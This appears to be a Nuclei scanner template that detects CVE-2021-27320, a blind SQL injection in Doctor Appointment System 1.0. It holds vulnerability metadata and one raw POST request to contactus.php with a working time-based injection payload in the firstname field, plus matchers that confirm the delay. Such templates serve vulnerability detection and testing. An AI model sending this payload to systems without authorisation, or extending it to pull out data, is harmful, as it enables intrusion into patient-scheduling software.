49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2021-27320
|
|
|
|
info:
|
|
name: Doctor Appointment System 1.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
|
|
- http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27320
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-27320
|
|
cwe-id: CWE-89
|
|
epss-score: 0.14008
|
|
epss-percentile: 0.95048
|
|
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: doctor_appointment_system_project
|
|
product: doctor_appointment_system
|
|
tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 10s
|
|
POST /contactus.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 500'
|
|
- 'contains(body, "Medical Management System")'
|
|
condition: and
|
|
|
|
# digest: 490a00463044022071e008d52ec972dec9c26a2ae45a53183058ef83282d8316245bf50e2709dc1f02200efbfc6455b840c6a66f3f3038bce935cc1829bcb85d3782b5908f6975b22a54:922c64590222798bb761d5b6d8e72950
|